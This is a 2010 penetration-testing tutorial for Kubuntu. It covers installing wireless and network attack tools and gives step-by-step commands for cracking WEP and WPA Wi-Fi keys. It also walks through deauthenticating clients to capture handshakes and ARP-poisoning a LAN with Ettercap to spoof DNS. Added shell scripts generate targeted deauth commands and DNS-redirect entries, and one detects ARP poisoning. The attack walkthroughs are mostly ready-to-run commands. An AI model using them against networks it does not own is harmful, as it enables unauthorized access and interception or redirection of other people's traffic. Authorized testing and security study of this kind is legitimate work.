Basic Penetration Testing: Kubuntu Style
Linux for the casual hacker

Installing:
Aircrack-ng
Ettercap
Kismet
MacChanger
Metasploit Framework
Nmap
Social Engineering Toolkit (SET)
Wireshark

Basic Use:
Kismet network sniffing
Aircrack-ng WEP and WPA cracking
Ettercap ARP poisoning / DNS spoofing

2010
Chris Griffith [email protected]
Version 1.1, February 25, 2010
CONTENTS
Step 1: Install Kubuntu
Step 2: Update apt-get
  Update repository list
  Upgrade current programs
Step 3: Install Basic Packages
Install Aircrack-ng
  Install Dependencies
  Download Aircrack-ng
  Download and Extract Dictionary
  Extract Aircrack-ng source files
  Install Aircrack-ng
  Update Airodump-ng
  Remove Install File
Install MacChanger
  Install Dependencies
  Install MacChanger
Install Wireshark
Install Kismet
  Install Dependencies
  Download Kismet
  Extract Kismet source files
  Run Configuration
  Install Kismet
  Remove Install File
  Configure Kismet
Install Metasploit
  Download Metasploit
  Enable Execution
  Install Metasploit
  Remove Install File
Install SET
  Install Dependencies
  Download SET
  Run SET
Install Nmap
  Download Nmap
  Extract Nmap Files
  Configure Nmap
  Install Nmap
  Install Nmap GUI, Zenmap
  Remove Install Files
Install Ettercap
  Install Dependencies
  Install Ettercap
  Install Ettercap's gtk GUI
Running Kismet
Running Aircrack-ng
  Scanning Networks
  WEP Attack
  WPA Attack
DNS spoofing with Ettercap
  Editing Where to Redirect Targets
  Sniffing Network Traffic
  Poisoning Targets
Contact Info
Legal Notice and Disclaimer
  Liability
  Legality
STEP 1: INSTALL KUBUNTU
(Most of these commands are also friendly with other flavors of Ubuntu)
• Go to http://www.kubuntu.org/
• Download (free) or order a CD/DVD of Kubuntu
• Install Kubuntu; if you need help there are plenty of community support sites online, similar to linux.com, that will help you get started
STEP 2: UPDATE APT-GET
Note: requires internet connection
apt-get is the program you will use to download most of the components in this guide. The first step is to update its repository list and then install any pending program updates. Run these commands from a terminal, found under Applications >> System >> Terminal.
NOTICE: Each block of code represents a single command, even if on multiple rows!
UPDATE REPOSITORY LIST
sudo apt-get -y update
UPGRADE CURRENT PROGRAMS
sudo apt-get -y upgrade
STEP 3: INSTALL BASIC PACKAGES
These will make your life easier while installing packages and using Kubuntu.
sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw libssl-dev
Note: While installing, it is assumed that you are starting in your home directory. You can make sure you are in that directory before doing any installations by typing in:
cd ~
(cd is a shell builtin, so it must be run without sudo: "sudo cd ~" changes directory in a throwaway child process and leaves your own shell where it was.)
INSTALL AIRCRACK-NG
Website: http://aircrack-ng.org/
Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools."
INSTALL DEPENDENCIES
sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar
DOWNLOAD AIRCRACK-NG
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
DOWNLOAD AND EXTRACT DICTIONARY
This is the word list (Glist.txt) used by the WPA dictionary attack later in this guide.
wget http://www.christophergriffith.net/downloads/Glist.rar
unrar e Glist.rar
EXTRACT AIRCRACK-NG SOURCE FILES
tar -zxvf aircrack-ng-1.0.tar.gz
cd aircrack-ng-1.0
INSTALL AIRCRACK-NG
make
sudo make install
UPDATE AIRODUMP-NG
This downloads the current IEEE OUI list so that airodump-ng can show the manufacturer of the MAC addresses it sees; it needs an internet connection.
sudo airodump-ng-oui-update
REMOVE INSTALL FILE
cd ~
rm aircrack-ng-1.0.tar.gz
rm -r aircrack-ng-1.0
(The archive and the source tree were created by your own user, so no sudo is needed to delete them.)
INSTALL MACCHANGER
Website: http://www.alobbs.com/macchanger
Description: "A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces"
INSTALL DEPENDENCIES
sudo apt-get -y install macchanger iproute-dev zenity
INSTALL MACCHANGER
sudo apt-get -y install macchanger-gtk
INSTALL WIRESHARK
Website: http://www.wireshark.org
Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions."
sudo apt-get -y install wireshark
Note: Capturing packets needs raw access to the interface, so on this setup Wireshark has to be started with sudo. A safer habit is to capture as root with tcpdump or dumpcap and open the resulting file in Wireshark as a normal user, which keeps Wireshark's large protocol-dissector code base from running as root.
INSTALL KISMET
Website: http://www.kismetwireless.net/
Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic."
INSTALL DEPENDENCIES
sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5
sudo apt-get -y install libpcap-dev libnl-dev libnl1
DOWNLOAD KISMET
wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz
EXTRACT KISMET SOURCE FILES
tar -zxvf kismet-2010-01-R1.tar.gz
cd kismet-2010-01-R1
RUN CONFIGURATION
./configure
Note: LOOK AT THE OUTPUT! If it says "LibNL/nl80211 support was not found", check that the libnl packages installed above are really present; the message can also appear simply because your driver does not need it. If configure reports other errors, fix them and run ./configure again before going on to "make dep".
INSTALL KISMET
make dep
make
sudo make install
Note: The build also offers "sudo make suidinstall", which lets you run kismet without being root. On Kubuntu that is very temperamental and still requires kismet_server to be started separately as root anyway, so I recommend plain "sudo make install" and running Kismet as root.
REMOVE INSTALL FILE
cd ~
rm kismet-2010-01-R1.tar.gz
rm -r kismet-2010-01-R1
CONFIGURE KISMET
You will also have to edit the configuration file before using Kismet. This is covered in the "Running Kismet" section below. You can open the file by typing
sudo kate /usr/local/etc/kismet.conf
INSTALL METASPLOIT
Metasploit is arguably the best open database of exploits.
Website: http://www.metasploit.com/
Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals."
DOWNLOAD METASPLOIT
wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run
ENABLE EXECUTION
chmod +x framework-3.3.3-linux-i686.run
INSTALL METASPLOIT
The installer runs as root, so only run a copy you fetched yourself from the official site.
sudo ./framework-3.3.3-linux-i686.run
REMOVE INSTALL FILE
In case you hate cluttering up your home folder like I do, remove the install file with:
rm framework-3.3.3-linux-i686.run
INSTALL SET
The Social Engineering Toolkit is a very easy way to run a multitude of different exploits by targeting the user with payloads from Metasploit.
Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit
Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform."
INSTALL DEPENDENCIES
NOTE: SET requires Metasploit; install it before trying to run SET.
sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full
DOWNLOAD SET
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
RUN SET
SET does NOT require installation. To run SET, go to its directory and type "sudo ./set". In this scenario the commands are:
cd SET
sudo ./set
INSTALL NMAP
Website: http://nmap.org/
Description: "Nmap ('Network Mapper') is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts."
Note: If you simply want to install Nmap and Zenmap and do not care whether they are the latest version, just type:
sudo apt-get -y install nmap
sudo apt-get -y install zenmap
If you DO want the newest version, follow these steps:
DOWNLOAD NMAP
wget http://nmap.org/dist/nmap-5.21.tar.bz2
EXTRACT NMAP FILES
bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -
cd nmap-5.21
CONFIGURE NMAP
./configure
INSTALL NMAP
make
sudo make install
INSTALL NMAP GUI, ZENMAP
sudo apt-get -y install zenmap
Note: The zenmap package depends on the repository nmap package, so apt pulls that in as well. The copy you built goes to /usr/local/bin, which comes before /usr/bin in the default PATH, so "nmap" from the terminal is still the newer one; check with "nmap --version".
REMOVE INSTALL FILES
cd ~
rm nmap-5.21.tar.bz2
rm -r nmap-5.21
(rmdir only removes empty directories, so the extracted source tree has to go with rm -r.)
INSTALL ETTERCAP
Website: http://ettercap.sourceforge.net/
Description: "Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis."
Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up to date version in the repositories. This just outlines which dependencies to get along with the GUI.
INSTALL DEPENDENCIES
sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev libncurses5 ettercap-common libnet1
INSTALL ETTERCAP
sudo apt-get -y install ettercap
INSTALL ETTERCAP'S GTK GUI
sudo apt-get -f -y install ettercap-gtk
RUNNING KISMET
Kismet is a user friendly program overall but needs some configuration before starting. Before starting Kismet, you need to edit the configuration file:
sudo kate /usr/local/etc/kismet.conf
Note: If you are running Ubuntu, type gedit instead of kate.
Once you have kismet.conf open, find the line
# logprefix=/some/path/to/logs
This sets where all of Kismet's log files are stored. I personally use
logprefix=/home/<myusername>/wifi/logs
(Change <myusername> to your own user name. The leading "#" marks the line as a comment, so remove it.) Before editing the line, create the directories in your home folder by opening a terminal and typing:
mkdir -p ~/wifi/logs ~/wifi/caps
(No sudo: the directories should belong to you, and root can write to them anyway. ~/wifi/caps is where the Aircrack-ng section below writes its capture files; airodump-ng does not create it for you.)
The next thing to specify is which of your adapters to use for wireless sniffing. Find the lines
# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
After these, add a line naming your adapter. Most people would add
ncsource=wlan0
NOTE: If you are unsure which adapter you have, open a terminal and type
ifconfig
This lists the network devices it finds. Choose a wireless card, generally named wlan or wifi followed by a number. (iwconfig, from the wireless-tools package, lists only the interfaces with wireless extensions and is the quicker way to tell them apart.)
The last thing you will want to change is the line that reads
# Do we have a GPS?
gps=true
If you don't have a GPS unit hooked up to your computer, change it to
gps=false
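The same three edits can be made from a script instead of by hand in kate, which also lets you keep a backup of the file and check that the interface you are about to name really exists. This is an added example and not part of the original guide: the cut-down kismet.conf it writes for the demo contains only the lines quoted above, and wlan0 and ~/wifi/logs are the values used in the text. To apply it to the real file, run it with sudo and pass /usr/local/etc/kismet.conf.

```shell
#!/bin/sh
# Added example, not part of the original guide: apply the three kismet.conf
# edits from a script (keeping a backup) and check the interface exists.
# write_sample_conf writes a constructed, cut-down copy of kismet.conf for
# the demo; the real file is /usr/local/etc/kismet.conf.

# configure_kismet CONF IFACE LOGDIR
#   uncomments logprefix and points it at LOGDIR, forces gps=false, and adds
#   ncsource=IFACE unless an active (uncommented) ncsource= line already exists.
#   LOGDIR must not contain '|' or '&' (they are special to the sed expression).
configure_kismet() {
    cp "$1" "$1.bak" || return 1          # keep the original next to the file
    sed -e "s|^# *logprefix=.*|logprefix=$3|" \
        -e 's/^gps=true/gps=false/' "$1.bak" > "$1"
    grep -q '^ncsource=' "$1" || printf 'ncsource=%s\n' "$2" >> "$1"
}

# iface_exists IFACE: true if the kernel has an interface with that name
# (sysfs check, so it works even where ifconfig/iwconfig are missing)
iface_exists() {
    [ -d "/sys/class/net/$1" ]
}

# get_setting CONF KEY: print the value of the first active KEY= line
get_setting() {
    sed -n "s/^$2=//p" "$1" | head -n 1
}

# write_sample_conf PATH: constructed excerpt of kismet.conf (only the lines
# discussed in the text) used by the demo below
write_sample_conf() {
    cat > "$1" <<'EOF'
# logprefix=/some/path/to/logs
# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
# Do we have a GPS?
gps=true
EOF
}

# Demo against a throwaway copy so nothing on the system is touched.
demo_conf=$(mktemp)
write_sample_conf "$demo_conf"
configure_kismet "$demo_conf" wlan0 "$HOME/wifi/logs"
echo "logprefix now: $(get_setting "$demo_conf" logprefix)"
echo "ncsource now:  $(get_setting "$demo_conf" ncsource)"
echo "gps now:       $(get_setting "$demo_conf" gps)"
iface_exists wlan0 || echo "wlan0 is not an interface on this machine; use a name from ifconfig"
rm -f "$demo_conf" "$demo_conf.bak"
```

Running configure_kismet a second time on the same file is harmless: the logprefix line is no longer commented so the sed does not touch it, and the grep stops a second ncsource line from being appended.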
You can now run Kismet by opening a terminal and typing
sudo kismet
On opening, if configured correctly, it should ask whether you want to start the Kismet server. Select yes.
It will then give you options about the Kismet server. You don't have to change anything here; click Start.
The terminal window now shows what the server is doing. This isn't overly exciting; it simply tells you if anything is going wrong. Close that window (bottom right hand corner) to get back to Kismet.
You should now see the main page of Kismet. From here you can see all the wireless networks it has picked up, the general packet rate and how much data is being transferred. You can also select an individual network to find out more about it. Before you can select a network, however, you have to sort them. I generally sort by which network has the most packet traffic: go to the top menu, Sort >> Packets (descending), or hit Alt+S then Shift+P.
You can now select a network, which displays general information about it. Click it or hit Enter to see more details. To get back to the regular view, go to Network >> Close Window, or Alt+N then W.
Another handy view is Windows >> Channel View (Alt+W then C). It shows which channels have the most traffic, the packet rate and general signal strength.
That is the basic usage of Kismet. If you are interested in knowing more, you can find a lot more usage details on forums and community sites.
RUNNING AIRCRACK-NG
Aircrack-ng is the premier wireless network cracking suite. A few steps make it much easier to crack a network. I will outline the basics of scanning for a network to attack and how to attack it if it uses either WEP or WPA.
SCANNING NETWORKS
First you want to put your wireless card in monitor mode. Do this by typing
sudo airmon-ng start <wireless interface>
For me this looks like:
sudo airmon-ng start wlan1
airmon-ng prints the name of the monitor interface it created. With the mac80211 drivers in this kernel that is mon0, which is what the rest of this guide uses; if yours is named differently, substitute it in the commands below.
We then start scanning the different networks with the interface in monitor mode:
sudo airodump-ng mon0
The first type of attack we are going to run is against a network using WEP encryption.
WEP ATTACK
Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and that you only want to log IVs:
sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0
For my network, my command looks like:
sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0
(airodump-ng will not create the wifi/caps directory for you; make sure it exists first.)
Once you have collected a LOT of IVs (the "#Data" column; tens of thousands are typical for a 104-bit key with the PTW attack, and a purely passive capture on a quiet network can take a long time to get there), start aircrack-ng on the file you have created. Note that it is now a .ivs file, and airodump-ng appends a sequence number, so the first run of that capture is WEP-01.ivs.
The command looks like:
sudo aircrack-ng -a 1 <cap file>
My command is:
sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs
Select the network you want to attack.
If it finds the key, you can use it to connect to the network. If not, it will ask you to capture more IVs and try again.
WPA ATTACK
To capture a WPA handshake you need a client to (re)connect while you are listening. You can simply wait for one, but it is much faster to force it: with a card that supports packet injection you can de-authenticate connected clients so they have to reconnect, and you capture their handshake as they do. You will also need a word list for the dictionary attack. There are many places to download them online; the Glist.rar downloaded and extracted in the Aircrack-ng install section is a small collection of very large dictionaries I compiled.
When you see a network that you are interested in, refine your scan to its channel and start logging the output:
sudo airodump-ng --channel <channel number> -w <cap file> mon0
The network I am going after is called Rogue Network, which is on channel 1, so my command looks like
sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0
While scanning, you will notice the different devices connected to each network listed underneath it. This attack is much more powerful if you have a particular client to de-authenticate.
Note: Make sure airodump-ng is still running in another terminal. You need to be capturing at the moment the clients re-authenticate, because that is when the handshake happens.
You can de-authenticate everyone and see who reconnects:
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0
Or you can target a particular client by adding its MAC address (the STATION column in airodump-ng) after -c:
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <client MAC> mon0
My example looks like:
sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0
Now switch over to the airodump-ng terminal and look in the upper right hand corner for "WPA handshake: <bssid>".
If you captured one, you can move on to the dictionary attack. If not, make sure the BSSID you gave aireplay-ng really is the WPA network, that there are clients connected to it, and that your card can actually inject (aireplay-ng --test mon0 checks this).
The next step uses the dictionary file to try a list of common words and passwords against the handshake:
sudo aircrack-ng -a 2 -w <dictionary file> <caps file>
My command looks like this:
sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap
It tests each word against the handshake and, hopefully, finds the key. Keep in mind that a WPA passphrase is 8 to 63 characters long, so entries shorter than 8 characters are skipped, and a passphrase that is not in the list cannot be found this way at all.
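The BSSID, channel and client MAC used above were read off the airodump-ng screen and typed in by hand, which is error prone. airodump-ng also writes a CSV next to its capture (the -w wifi/caps/WPA run above produces wifi/caps/WPA-01.csv) containing an access-point table, a blank line, and a station table. The helpers below, an added example that is not part of the original guide, pull the values for a named ESSID out of that file and print the airodump-ng and aireplay-ng commands for the scanning and WPA steps. The CSV they run on is constructed for the demo, using the Rogue Network addresses from the text; point them at your own WPA-01.csv for real use.

```shell
#!/bin/sh
# Added example, not part of the original guide. airodump-ng writes a CSV
# next to its capture: an AP table, a blank line, then a station table. These
# helpers pull the BSSID, channel and associated clients for an ESSID out of
# it and print the airodump-ng / aireplay-ng commands, so the -a/-c values are
# not copied by eye from the screen. write_sample_csv writes a constructed CSV
# for the demo; its addresses are the ones used in the walkthrough above.

# ap_for_essid CSV ESSID -> "BSSID CHANNEL" of the first AP with that ESSID
ap_for_essid() {
    awk -F', *' -v essid="$2" '
        /^Station MAC/ { exit }             # station table starts: stop
        /^BSSID/ || NF < 14 { next }        # header line / blank line
        $14 == essid { print $1, $4; exit } # field 14 = ESSID, 4 = channel
    ' "$1"
}

# clients_of CSV BSSID -> one associated station MAC per line
clients_of() {
    awk -F', *' -v bssid="$2" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && $6 == bssid { print $1 }   # field 6 = AP the station is on
    ' "$1"
}

# plan_attack CSV ESSID MONIF -> the capture command plus one targeted deauth
# per associated client; fails (exit 1) if the ESSID is not in the CSV
plan_attack() {
    set -- "$1" "$2" "$3" "$(ap_for_essid "$1" "$2")"
    if [ -z "$4" ]; then
        echo "no access point named '$2' in $1" >&2
        return 1
    fi
    bssid=${4% *}
    chan=${4#* }
    echo "sudo airodump-ng --channel $chan --bssid $bssid -w wifi/caps/WPA $3"
    clients_of "$1" "$bssid" | while read -r sta; do
        echo "sudo aireplay-ng --deauth 5 -a $bssid -c $sta $3"
    done
}

# write_sample_csv PATH: constructed airodump-ng CSV, two APs and two stations
write_sample_csv() {
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:D1:C3:C9:88, 2010-02-25 10:00:00, 2010-02-25 10:05:00,  1,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,  13, Rogue Network,
00:1A:2B:3C:4D:5E, 2010-02-25 10:00:02, 2010-02-25 10:05:00,  8,  54, WEP, WEP, , -60,       80,     3100,   0.  0.  0.  0,   6, OldNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:EA:72:58:BA, 2010-02-25 10:00:10, 2010-02-25 10:05:00, -50,       35, 00:14:D1:C3:C9:88, Rogue Network
00:21:5C:AA:BB:CC, 2010-02-25 10:01:00, 2010-02-25 10:04:30, -70,        9, (not associated), Rogue Network,linksys
EOF
}

# Demo on the constructed CSV; for real use: plan_attack wifi/caps/WPA-01.csv "Rogue Network" mon0
demo_csv=$(mktemp)
write_sample_csv "$demo_csv"
plan_attack "$demo_csv" "Rogue Network" mon0
rm -f "$demo_csv"
```

The --bssid filter on the printed airodump-ng command keeps the capture (and the handshake check in its top-right corner) to the one network you are after. Stations that airodump-ng lists as "(not associated)" are only probing and never appear in the deauth list, since de-authenticating them cannot produce a handshake.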
DNS SPOOFING WITH ETTERCAP
EDITING WHERE TO REDIRECT TARGETS
The first step is to decide where to redirect the target. Open etter.dns as root:
sudo kate /usr/share/ettercap/etter.dns
At the end of the file, add the domain you want to redirect and the IP you want to send it to, in the form: the domain, then A, then the IP.
For example, to redirect traffic for Google to Bing, type
google.com A 64.4.8.147
*.google.com A 64.4.8.147
The second line includes a wildcard, so any subdomain of google.com (www.google.com included) is also redirected. You can find the IP address of the site you want to redirect to by going to the terminal and typing:
host <website url>
This displays the addresses tied to that domain; the "has address" lines are its IPv4 addresses, and the first one is the one to use.
Save and close the file, then start Ettercap as root:
sudo ettercap -G
Note: If you have problems with Ettercap in GTK mode, try running it directly in the terminal with curses: "sudo ettercap -C".
Now that you have your shiny front end, the first thing to do is start sniffing the traffic of the network you are connected to. Remember, Ettercap only works while you are connected to a network (it is an ARP-level attack on the local LAN), while Aircrack-ng and Kismet work better without being connected.
SNIFFING NETWORK TRAFFIC
The next step is to start sniffing the traffic and find all the hosts on your network. Start "Unified sniffing..." under the "Sniff" menu (Sniff >> Unified sniffing...), or hit Shift+U.
This brings up a drop-down box of interfaces to sniff on. Select the one you are connected to the network with. After selecting it and hitting OK, you will notice a larger selection of menu items.
Running in curses: you will need to type the name of the adapter instead.
Now scan all the hosts on your network to select your targets: go to Hosts >> Scan for hosts, or Ctrl+S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.
Now you need to select who you want to poison. You will be the "man in the middle", choosing which connections to sit between. To successfully spoof the DNS of the target computers, you must know the device they use as their gateway. Most home routers are in the 192.168.0.1 - 192.168.1.10 range; if in doubt, it is the address listed as the default route on your own machine (route -n). The one in the examples is 192.168.1.1. Select it and click "Add to Target 1", then select all the other devices, or the specific one you want to poison, and add them to Target 2.
Running in curses: you have to add the targets manually. Hit Ctrl+T or go to Targets >> Select TARGET(s), then enter the IPs of the targets between slashes: /192.168.1.1/ for a single host, or /192.168.1.1-255/ for a range.
Note: You can check that you specified the right targets by hitting T or going to Targets >> Current Targets.
POISONING TARGETS
Now you need to poison the targets' ARP caches. Go to Mitm >> Arp poisoning... A popup appears; you don't need any of the optional parameters, just accept and go on. Now hit Ctrl+W to start sniffing, or go to Start >> Start sniffing.
Finally, enable the DNS spoofing plugin by hitting Ctrl+P (Plugins >> Manage the plugins) and selecting "dns_spoof".
In the console underneath you should now see "Activating dns_spoof plugin..."
Then lean back and watch the plugin work: each time a target looks up a spoofed name it prints "dns_spoof: [<original url>] spoofed to [<new ip>]".
Keep in mind how visible this is from the other side. After the poisoning, the victims' ARP caches map both the gateway's IP and your IP to your MAC, which shows up as two IPs sharing one MAC in "arp -n", and Wireshark flags the same thing as a duplicate IP address in its ARP expert info. Expect it to be noticed on any monitored network.
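The following is an added example, not part of the original guide, for two points of this section: building the etter.dns lines from the output of host (so the IP is parsed rather than retyped, and a malformed address is rejected before it goes in the file), and the check a target, or you testing your own LAN, would run to spot the poisoning: two IPs answering with the same MAC in arp -n. The host and arp -n outputs it uses are constructed samples, with the Bing address from the text and made-up MACs and LAN addresses.

```shell
#!/bin/sh
# Added example, not part of the original guide. Helpers for the etter.dns
# step above, and the check that reveals the ARP poisoning from the other
# side: after Mitm >> Arp poisoning the victims' ARP caches map both the
# gateway's IP and the attacker's IP to the attacker's MAC. The `host` and
# `arp -n` outputs used below are constructed samples, not live output.

# first_a_record: read `host` output on stdin, print the first IPv4 address
first_a_record() {
    awk '$2 == "has" && $3 == "address" { print $4; exit }'
}

# etter_dns_lines DOMAIN IP -> the plain and wildcard A records for etter.dns;
# refuses an IP that is not four dotted decimals, since a malformed entry is
# easy to miss in the file and silently breaks the redirect
etter_dns_lines() {
    echo "$2" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || {
        echo "not an IPv4 address: $2" >&2
        return 1
    }
    printf '%s A %s\n*.%s A %s\n' "$1" "$2" "$1" "$2"
}

# arp_dupes: read `arp -n` output on stdin; print "MAC ip ip ..." for every
# MAC that more than one IP resolves to. Empty output means nothing to report.
arp_dupes() {
    awk '$2 == "ether" { ips[$3] = ips[$3] " " $1; seen[$3]++ }
         END { for (m in seen) if (seen[m] > 1) print m ips[m] }'
}

# Constructed samples of what the two commands print
sample_host_output() {
    cat <<'EOF'
bing.com has address 64.4.8.147
bing.com mail is handled by 10 mail.example.
EOF
}
sample_poisoned_arp() {
    cat <<'EOF'
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     eth0
192.168.1.20             ether   00:11:22:33:44:55   C                     eth0
192.168.1.30             ether   00:aa:bb:cc:dd:ee   C                     eth0
EOF
}
sample_clean_arp() {
    cat <<'EOF'
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:de:ad:be:ef:01   C                     eth0
192.168.1.30             ether   00:aa:bb:cc:dd:ee   C                     eth0
EOF
}

# Demo: etter.dns lines from the resolver output, then the ARP check on both
# samples. On a live machine the check is simply:  arp -n | arp_dupes
target_ip=$(sample_host_output | first_a_record)
etter_dns_lines google.com "$target_ip"
echo "poisoned table -> $(sample_poisoned_arp | arp_dupes)"
echo "clean table    -> '$(sample_clean_arp | arp_dupes)'"
```

To append the generated lines to the real file run the generator under sudo, for example sudo sh -c 'etter_dns_lines google.com 64.4.8.147 >> /usr/share/ettercap/etter.dns' from a shell where the function is defined. A shared MAC in the ARP table is a signal to investigate, not proof of an attack: a router that owns several addresses on the LAN also shows up this way, so compare the MAC against the one the gateway had before.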
CONTACT INFO
I hope you have found this information useful and accurate.
If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.
LEGAL NOTICE AND DISCLAIMER
LIABILITY
1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no responsibility for your actions with this knowledge. I hope you find it useful to test on your own network and learn how to tighten your own security.
LEGALITY
2. It is ILLEGAL to use many of these programs on networks you don't own. Make sure you are abiding by all laws while using these programs.